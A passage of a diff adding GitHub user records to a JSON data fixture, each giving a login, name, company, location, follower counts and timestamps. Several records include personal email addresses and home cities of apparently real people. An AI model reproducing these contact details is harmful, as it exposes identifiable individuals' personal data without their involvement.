"2024-09-12T01:34:17.293Z", + "name": "xiwu", + "login": "aboutbo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13026505?v=4", + "company": "Netease", + "location": "Hangzhou", + "collaborators_count": 0, + "following_count": 46, + "followers_count": 10, + "public_gists_count": 0, + "public_repositories_count": 68, + "created_at": "2015-06-24T02:19:29Z", + "updated_at": "2023-09-04T02:37:06Z", + "node_id": "MDQ6VXNlcjEzMDI2NTA1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2585, + "fields": { + "nest_created_at": "2024-09-12T01:34:19.038Z", + "nest_updated_at": "2024-09-12T01:34:19.038Z", + "name": "", + "login": "grumpy-miner", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/81763239?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 3, + "public_repositories_count": 15, + "created_at": "2021-04-01T14:40:23Z", + "updated_at": "2024-08-04T19:17:58Z", + "node_id": "MDQ6VXNlcjgxNzYzMjM5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2586, + "fields": { + "nest_created_at": "2024-09-12T01:34:26.700Z", + "nest_updated_at": "2024-09-12T01:34:26.700Z", + "name": "Matt Shein", + "login": "matts-au", + "email": "matt.shein@autonomic.com", + "avatar_url": "https://avatars.githubusercontent.com/u/85510950?v=4", + "company": "Autonomic", + "location": "Seattle, WA USA", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-06-07T16:39:54Z", + "updated_at": "2024-09-09T17:12:22Z", + "node_id": "MDQ6VXNlcjg1NTEwOTUw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2587, + "fields": { + "nest_created_at": "2024-09-12T01:34:28.434Z", + "nest_updated_at": "2024-09-12T01:34:28.434Z", + "name": "Gurdip Sira", + "login": "GurdipS5", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/87333788?v=4", + "company": "", + "location": "London", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 31, + "created_at": "2021-07-12T18:08:22Z", + "updated_at": "2024-09-05T17:36:37Z", + "node_id": "MDQ6VXNlcjg3MzMzNzg4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2588, + "fields": { + "nest_created_at": "2024-09-12T01:34:32.187Z", + "nest_updated_at": "2024-09-12T01:34:32.187Z", + "name": "", + "login": "antoinbo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/87284775?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2021-07-11T22:59:04Z", + "updated_at": "2024-08-09T06:20:59Z", + "node_id": "MDQ6VXNlcjg3Mjg0Nzc1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2589, + "fields": { + "nest_created_at": "2024-09-12T01:34:34.438Z", + "nest_updated_at": "2024-09-12T01:34:34.438Z", + "name": "", + "login": "jwdisy", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/141859936?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-08-09T17:02:14Z", + "updated_at": "2024-01-22T13:30:42Z", + "node_id": "U_kgDOCHScYA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2590, + "fields": { + "nest_created_at": "2024-09-12T01:34:39.056Z", + "nest_updated_at": "2024-09-12T02:09:26.184Z", + "name": "Markus Müller", + "login": "markusmuellerusi", + "email": "markus@dmsk-mueller.de", + "avatar_url": "https://avatars.githubusercontent.com/u/11981532?v=4", + "company": "-", + "location": "Usingen", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2015-04-16T16:18:48Z", + "updated_at": "2023-11-16T08:14:47Z", + "node_id": "MDQ6VXNlcjExOTgxNTMy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2591, + "fields": { + "nest_created_at": "2024-09-12T01:34:44.528Z", + "nest_updated_at": "2024-09-12T02:09:49.302Z", + "name": "", + "login": "sithmein", + "email": "thorsten@meinl.bnv-bamberg.de", + "avatar_url": "https://avatars.githubusercontent.com/u/4947218?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2013-07-05T09:25:51Z", + "updated_at": "2024-09-02T11:32:44Z", + "node_id": "MDQ6VXNlcjQ5NDcyMTg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2592, + "fields": { + "nest_created_at": "2024-09-12T01:34:46.570Z", + "nest_updated_at": "2024-09-12T01:34:46.570Z", + "name": "", + "login": "bofrog", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/138496187?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2023-07-03T13:08:31Z", + "updated_at": "2023-08-24T16:33:08Z", + "node_id": "U_kgDOCEFIuw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2593, + "fields": { + "nest_created_at": "2024-09-12T01:34:53.233Z", + "nest_updated_at": "2024-09-12T01:34:53.233Z", + "name": "rnd", + "login": "chenjianquan7", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26828709?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2017-04-01T01:18:36Z", + "updated_at": "2024-09-02T03:19:05Z", + "node_id": "MDQ6VXNlcjI2ODI4NzA5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2594, + "fields": { + "nest_created_at": "2024-09-12T01:34:56.642Z", + "nest_updated_at": "2024-09-12T01:34:56.642Z", + "name": "", + "login": "rsproductsecurity", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/139795744?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-07-17T16:32:58Z", + "updated_at": "2024-07-29T15:36:59Z", + "node_id": "U_kgDOCFUdIA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2595, + "fields": { + "nest_created_at": "2024-09-12T01:34:58.262Z", + "nest_updated_at": "2024-09-12T01:34:58.262Z", + "name": "", + "login": "Atharex", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2872241?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2012-11-23T14:55:39Z", + "updated_at": "2024-09-11T18:56:22Z", + "node_id": "MDQ6VXNlcjI4NzIyNDE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2596, + "fields": { + "nest_created_at": "2024-09-12T01:35:05.812Z", + "nest_updated_at": "2024-09-12T01:35:05.812Z", + "name": "", + "login": "ckazimie", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/762436?v=4", + "company": "DXC.technology", + "location": "Copenhagen", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2011-05-01T21:41:37Z", + "updated_at": "2024-07-07T08:48:50Z", + "node_id": "MDQ6VXNlcjc2MjQzNg==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2597, + "fields": { + "nest_created_at": "2024-09-12T01:35:09.175Z", + "nest_updated_at": "2024-09-12T01:35:09.175Z", + "name": "Jörg Kubitz", + "login": "jukzi", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/51790620?v=4", + "company": "ssi", + "location": "Germany", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 32, + "created_at": "2019-06-13T13:50:27Z", + "updated_at": "2024-08-12T07:20:51Z", + "node_id": "MDQ6VXNlcjUxNzkwNjIw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2598, + "fields": { + "nest_created_at": "2024-09-12T01:35:10.819Z", + "nest_updated_at": "2024-09-12T01:35:10.819Z", + "name": "Pasha Radchenko", + "login": "ep4sh", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/19505042?v=4", + "company": "RXLab", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 9, + "public_gists_count": 30, + "public_repositories_count": 22, + "created_at": "2016-05-21T12:59:45Z", + "updated_at": "2024-09-05T11:37:34Z", + "node_id": "MDQ6VXNlcjE5NTA1MDQy", + "bio": "PLUS ULTRA", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2599, + "fields": { + "nest_created_at": "2024-09-12T01:35:14.142Z", + "nest_updated_at": "2024-09-12T01:35:14.142Z", + "name": "Leonid Bugaev", + "login": "buger", + "email": "leonsbox@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/14009?v=4", + "company": "Tyk.io", + "location": "Istanbul", + "collaborators_count": 0, + "following_count": 28, + "followers_count": 3079, + "public_gists_count": 50, + "public_repositories_count": 135, + "created_at": "2008-06-17T07:35:50Z", + "updated_at": "2024-08-06T16:47:55Z", + "node_id": "MDQ6VXNlcjE0MDA5", + "bio": "👉 👉 👉 👉 👉 👉 👉 👉 👉 👉 👉 ", + "is_hireable": false, + "twitter_username": "buger" + } +}, +{ + "model": "github.user", + "pk": 2600, + "fields": { + "nest_created_at": "2024-09-12T01:35:16.216Z", + "nest_updated_at": "2024-09-22T19:42:23.025Z", + "name": "Michael Macnair", + "login": "mykter", + "email": "git@mykter.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1424497?v=4", + "company": "", + "location": "UK", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 46, + "public_gists_count": 5, + "public_repositories_count": 30, + "created_at": "2012-02-09T21:55:36Z", + "updated_at": "2024-09-20T16:54:38Z", + "node_id": "MDQ6VXNlcjE0MjQ0OTc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2601, + "fields": { + "nest_created_at": "2024-09-12T01:35:17.925Z", + "nest_updated_at": "2024-09-12T01:36:40.608Z", + "name": "", + "login": "troy256", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/48829375?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-03-22T12:18:09Z", + "updated_at": "2024-09-05T10:57:22Z", + "node_id": "MDQ6VXNlcjQ4ODI5Mzc1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2602, + "fields": { + "nest_created_at": "2024-09-12T01:35:19.575Z", + "nest_updated_at": "2024-09-12T01:35:19.575Z", + "name": "Nedeljko Ned Scepanovic", + "login": "zeenmc", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/63357450?v=4", + "company": "", + "location": "Belgrade, Serbia", + "collaborators_count": 0, + "following_count": 12, + "followers_count": 16, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2020-04-08T14:28:10Z", + "updated_at": "2024-08-11T20:11:51Z", + "node_id": "MDQ6VXNlcjYzMzU3NDUw", + "bio": "DevOps engineer with experience in ISP environment. ", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2603, + "fields": { + "nest_created_at": "2024-09-12T01:35:25.407Z", + "nest_updated_at": "2024-09-13T05:08:07.752Z", + "name": "Harsha Bachina", + "login": "hvardhan20", + "email": "hvardhan20@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6909215?v=4", + "company": "", + "location": "USA", + "collaborators_count": 0, + "following_count": 33, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 29, + "created_at": "2014-03-10T16:04:11Z", + "updated_at": "2024-06-24T05:19:52Z", + "node_id": "MDQ6VXNlcjY5MDkyMTU=", + "bio": "enthusiast of all things software, systems & matrix", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2604, + "fields": { + "nest_created_at": "2024-09-12T01:35:26.714Z", + "nest_updated_at": "2024-09-12T01:35:26.714Z", + "name": "Jan Werner", + "login": "janjwerner-confluent", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/105367074?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2022-05-11T13:10:29Z", + "updated_at": "2024-07-22T15:16:12Z", + "node_id": "U_kgDOBkfGIg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2605, + "fields": { + "nest_created_at": "2024-09-12T01:35:28.783Z", + "nest_updated_at": "2024-09-22T18:52:43.475Z", + "name": "Nicklas Körtge", + "login": "n1ckl0sk0rtge", + "email": "nicklas.koertge@protonmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/25745329?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 6, + "public_gists_count": 9, + "public_repositories_count": 15, + "created_at": "2017-02-13T13:57:34Z", + "updated_at": "2024-09-08T12:24:23Z", + "node_id": "MDQ6VXNlcjI1NzQ1MzI5", + "bio": "Researcher and Software Engineer with focus on Quantum Safe and Security", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2606, + "fields": { + "nest_created_at": "2024-09-12T01:35:30.934Z", + "nest_updated_at": "2024-09-16T22:28:50.247Z", + "name": "Freddi", + "login": "freddiN", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/14030572?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2015-08-29T14:33:52Z", + "updated_at": "2024-09-04T11:34:40Z", + "node_id": "MDQ6VXNlcjE0MDMwNTcy", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2607, + "fields": { + "nest_created_at": "2024-09-12T01:35:32.616Z", + "nest_updated_at": "2024-09-12T01:35:32.616Z", + "name": "Elifarley C.", + "login": "elifarley", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/519940?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 71, + "followers_count": 47, + "public_gists_count": 20, + "public_repositories_count": 97, + "created_at": "2010-12-12T13:52:56Z", + "updated_at": "2024-09-04T23:03:15Z", + "node_id": "MDQ6VXNlcjUxOTk0MA==", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2608, + "fields": { + "nest_created_at": "2024-09-12T01:35:38.904Z", + "nest_updated_at": "2024-09-12T01:35:38.904Z", + "name": "Gregor Latuske", + "login": "glatuske", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5259942?v=4", + "company": "ETAS GmbH", + "location": "Kornwestheim, Germany", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2013-08-19T08:39:22Z", + "updated_at": "2024-09-05T15:17:59Z", + "node_id": "MDQ6VXNlcjUyNTk5NDI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2609, + "fields": { + "nest_created_at": "2024-09-12T01:35:48.070Z", + "nest_updated_at": "2024-09-12T01:35:48.070Z", + "name": "Xavier Calland", + "login": "xavier-calland", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1773123?v=4", + "company": "@atolcd ", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 4, + "public_gists_count": 2, + "public_repositories_count": 6, + "created_at": "2012-05-24T07:38:19Z", + "updated_at": "2024-08-20T15:57:33Z", + "node_id": "MDQ6VXNlcjE3NzMxMjM=", + "bio": "", + "is_hireable": false, + "twitter_username": "xcalland" + } +}, +{ + "model": "github.user", + "pk": 2610, + "fields": { + "nest_created_at": "2024-09-12T01:35:49.785Z", + "nest_updated_at": "2024-09-16T22:29:29.504Z", + "name": "", + "login": "somera", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8334250?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 465, + "followers_count": 34, + "public_gists_count": 14, + "public_repositories_count": 11, + "created_at": "2014-08-01T23:09:50Z", + "updated_at": "2023-11-07T14:28:14Z", + "node_id": "MDQ6VXNlcjgzMzQyNTA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2611, + "fields": { + "nest_created_at": "2024-09-12T01:35:52.660Z", + "nest_updated_at": "2024-09-22T18:49:18.066Z", + "name": "Surendra Pathak", + "login": "surendrapathak", + "email": "surendra.pathak@interlynk.io", + "avatar_url": "https://avatars.githubusercontent.com/u/1686327?v=4", + "company": "@interlynk-io ", + "location": "San Francisco, CA", + "collaborators_count": 0, + "following_count": 20, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2012-04-27T20:10:20Z", + "updated_at": "2024-09-13T18:44:12Z", + "node_id": "MDQ6VXNlcjE2ODYzMjc=", + "bio": "", + "is_hireable": true, + "twitter_username": "interlynksp" + } +}, +{ + "model": "github.user", + "pk": 2612, + "fields": { + "nest_created_at": "2024-09-12T01:35:53.974Z", + "nest_updated_at": "2024-09-12T01:35:53.974Z", + "name": "", + "login": "komaldadore-TU", + "email": "komal.dadore@taskus.com", + "avatar_url": "https://avatars.githubusercontent.com/u/118332577?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-11-16T05:20:08Z", + "updated_at": "2023-10-12T07:19:05Z", + "node_id": "U_kgDOBw2coQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2613, + "fields": { + "nest_created_at": "2024-09-12T01:35:55.676Z", + "nest_updated_at": "2024-09-12T01:35:55.676Z", + "name": "Ash Allen", + "login": "aja08379", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/60787692?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2020-02-07T15:36:03Z", + "updated_at": "2024-07-24T14:48:05Z", + "node_id": "MDQ6VXNlcjYwNzg3Njky", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2614, + "fields": { + "nest_created_at": "2024-09-12T01:36:00.279Z", + "nest_updated_at": "2024-09-16T22:28:53.015Z", + "name": "Matthew Trees", + "login": "javaface", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5598089?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2013-10-02T20:00:35Z", + "updated_at": "2024-04-09T15:33:13Z", + "node_id": "MDQ6VXNlcjU1OTgwODk=", + "bio": "This is my personal GitHub account.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2615, + "fields": { + "nest_created_at": "2024-09-12T01:36:03.639Z", + "nest_updated_at": "2024-09-12T01:36:03.639Z", + "name": "Hugh", + "login": "wujunhuge", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/108388033?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-06-29T05:55:15Z", + "updated_at": "2024-07-05T02:43:44Z", + "node_id": "U_kgDOBnXewQ", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2616, + "fields": { + "nest_created_at": "2024-09-12T01:36:05.302Z", + "nest_updated_at": "2024-09-22T19:40:10.553Z", + "name": "Youssef Bel Mekki", + "login": "ybelMekk", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38552193?v=4", + "company": "@nais, @navikt", + "location": "Oslo", + "collaborators_count": 0, + "following_count": 7, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2018-04-20T06:46:02Z", + "updated_at": "2024-08-05T08:28:32Z", + "node_id": "MDQ6VXNlcjM4NTUyMTkz", + "bio": "Devops / Programmer.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2617, + "fields": { + "nest_created_at": "2024-09-12T01:36:06.521Z", + "nest_updated_at": "2024-09-12T01:36:06.521Z", + "name": "Tom Kuipers", + "login": "tomkuipers", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/701208?v=4", + "company": "Universiteit van Amsterdam", + "location": "Amsterdam", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 5, + "public_gists_count": 1, + "public_repositories_count": 37, + "created_at": "2011-03-31T09:28:21Z", + "updated_at": "2024-06-19T10:23:16Z", + "node_id": "MDQ6VXNlcjcwMTIwOA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2618, + "fields": { + "nest_created_at": "2024-09-12T01:36:14.441Z", + "nest_updated_at": "2024-09-22T19:42:30.977Z", + "name": "Steffen Müller (HG)", + "login": "muellerst-hg", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/113037816?v=4", + "company": "@Haufe-Lexware", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2022-09-07T13:54:01Z", + "updated_at": "2024-09-04T12:29:10Z", + "node_id": "U_kgDOBrzR-A", + "bio": "DevOps Engineer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2619, + "fields": { + "nest_created_at": "2024-09-12T01:36:16.109Z", + "nest_updated_at": "2024-09-22T19:42:25.912Z", + "name": "Lukas Braune", + "login": "lukas-braune", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9955029?v=4", + "company": "@Rohde-Schwarz", + "location": "Munich, Germany", + "collaborators_count": 0, + "following_count": 24, + "followers_count": 15, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2014-11-25T23:55:57Z", + "updated_at": "2024-08-19T08:56:46Z", + "node_id": "MDQ6VXNlcjk5NTUwMjk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2620, + "fields": { + "nest_created_at": "2024-09-12T01:36:17.430Z", + "nest_updated_at": "2024-09-12T01:36:17.430Z", + "name": "", + "login": "apsdts", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/116338814?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-10-21T06:59:51Z", + "updated_at": "2022-10-21T06:59:51Z", + "node_id": "U_kgDOBu8wfg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2621, + "fields": { + "nest_created_at": "2024-09-12T01:36:19.067Z", + "nest_updated_at": "2024-09-12T01:36:19.067Z", + "name": "", + "login": "yuri-kolesov", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/117815099?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-11-09T09:11:29Z", + "updated_at": "2023-12-21T13:31:25Z", + "node_id": "U_kgDOBwW3Ow", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2622, + "fields": { + "nest_created_at": "2024-09-12T01:36:20.738Z", + "nest_updated_at": "2024-09-12T01:36:20.738Z", + "name": "Lumír Jasiok", + "login": "jas02", + "email": "lumir.jasiok@alfawolf.eu", + "avatar_url": "https://avatars.githubusercontent.com/u/1891408?v=4", + "company": "", + "location": "Czech Republic", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 4, + "public_gists_count": 24, + "public_repositories_count": 40, + "created_at": "2012-06-25T20:40:34Z", + "updated_at": "2024-08-18T11:21:16Z", + "node_id": "MDQ6VXNlcjE4OTE0MDg=", + "bio": "", + "is_hireable": false, + "twitter_username": "LumirJasiok" + } +}, +{ + "model": "github.user", + "pk": 2623, + "fields": { + "nest_created_at": "2024-09-12T01:36:23.669Z", + "nest_updated_at": "2024-09-12T01:36:23.669Z", + "name": "Sebastian Sommer", + "login": "sosnet", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/945587?v=4", + "company": "", + "location": "Graz - Austria", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2011-07-28T23:36:22Z", + "updated_at": "2024-03-29T11:08:07Z", + "node_id": "MDQ6VXNlcjk0NTU4Nw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2624, + "fields": { + "nest_created_at": "2024-09-12T01:36:25.360Z", + "nest_updated_at": "2024-09-18T00:18:15.937Z", + "name": "oers", + "login": "oers", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1115563?v=4", + "company": "EBP Deutschland GmbH", + "location": "Berlin", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2011-10-10T06:47:37Z", + "updated_at": "2024-09-17T17:06:57Z", + "node_id": "MDQ6VXNlcjExMTU1NjM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2625, + "fields": { + "nest_created_at": "2024-09-12T01:36:29.045Z", + "nest_updated_at": "2024-09-12T01:36:29.045Z", + "name": "", + "login": "whiteninja76", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/34644528?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2017-12-18T08:36:20Z", + "updated_at": "2024-07-31T09:43:44Z", + "node_id": "MDQ6VXNlcjM0NjQ0NTI4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2626, + "fields": { + "nest_created_at": "2024-09-12T01:36:32.509Z", + "nest_updated_at": "2024-09-16T22:28:56.103Z", + "name": "", + "login": "mwilfried", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32105900?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2017-09-19T16:48:03Z", + "updated_at": "2023-04-06T10:26:58Z", + "node_id": "MDQ6VXNlcjMyMTA1OTAw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2627, + "fields": { + "nest_created_at": "2024-09-12T01:36:43.211Z", + "nest_updated_at": "2024-09-12T01:36:43.211Z", + "name": "Михаил Красильников", + "login": "mekras", + "email": "m.krasilnikov@yandex.ru", + "avatar_url": "https://avatars.githubusercontent.com/u/192067?v=4", + "company": "@dobrosite ", + "location": "Россия, Московская область, Долгопрудный", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 15, + "public_gists_count": 3, + "public_repositories_count": 26, + "created_at": "2010-01-29T05:41:55Z", + "updated_at": "2024-08-14T08:31:19Z", + "node_id": "MDQ6VXNlcjE5MjA2Nw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2628, + "fields": { + "nest_created_at": "2024-09-12T01:36:45.740Z", + "nest_updated_at": "2024-09-12T01:36:45.741Z", + "name": "", + "login": "ellipse2v", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45236751?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2018-11-21T14:50:03Z", + "updated_at": "2024-09-05T18:02:55Z", + "node_id": "MDQ6VXNlcjQ1MjM2NzUx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 2629, + "fields": { + "nest_created_at": "2024-09-12T01:36:46.990Z", + "nest_updated_at": "2024-09-12T01:36:46.990Z", + "name": "Elliot Segler", + "login": "elliotsegler", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/361995?v=4", + "company": "@akkodis-aws", + "location": "Perth, AU", + "collaborators_count": 0, + "following_count": 16, + "followers_count": 4, + "public_gists_count": 2, + "public_repositories_count": 60, + "created_at": "2010-08-12T10:16:17Z", + "updated_at": "2024-08-09T05:53:54Z", + "node_id": "MDQ6VXNlcjM2MTk5NQ==", + "bio": "Cloud guy 